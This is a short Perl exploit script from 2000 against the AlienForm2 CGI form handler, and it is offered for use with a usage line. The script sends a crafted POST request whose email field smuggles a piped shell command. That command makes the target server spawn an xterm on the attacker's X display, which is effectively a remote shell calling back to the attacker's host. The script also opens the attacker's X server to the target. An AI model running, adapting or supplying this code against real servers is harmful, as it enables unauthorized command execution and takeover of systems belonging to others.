#!/usr/bin/perl -w ## -- AlienForm2 exploit. (http://alienform.com/) -- ## I am not sure if this exploit will work on earlier ## versions, but I believe it to be plausible. In some ## cases you may have to tweak this exploit somewhat in ## order to make it work. ## ## This exploit will spawn a xterm from $target ## to $attacker:$dpy. ## ## - teleh0r@doglover.com / anno 2000 - ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 \n"); exit(1); } my($target,$attacker,$dpy,$length,$command, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/af.cgi\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 181 + length($attacker.$dpy); $command = "_send_email1=%7Cxterm+-ut+-display+$attacker%3A$dpy%7C&_send_email2=". "email2.txt&_out_file=logfile.txt&_error_path=error.txt&_browser_out=". "output.txt&rd_age=10&re_email=hass%40hass.com&r_colour=Red"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;) $sploit= "POST /cgi-bin/af.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0);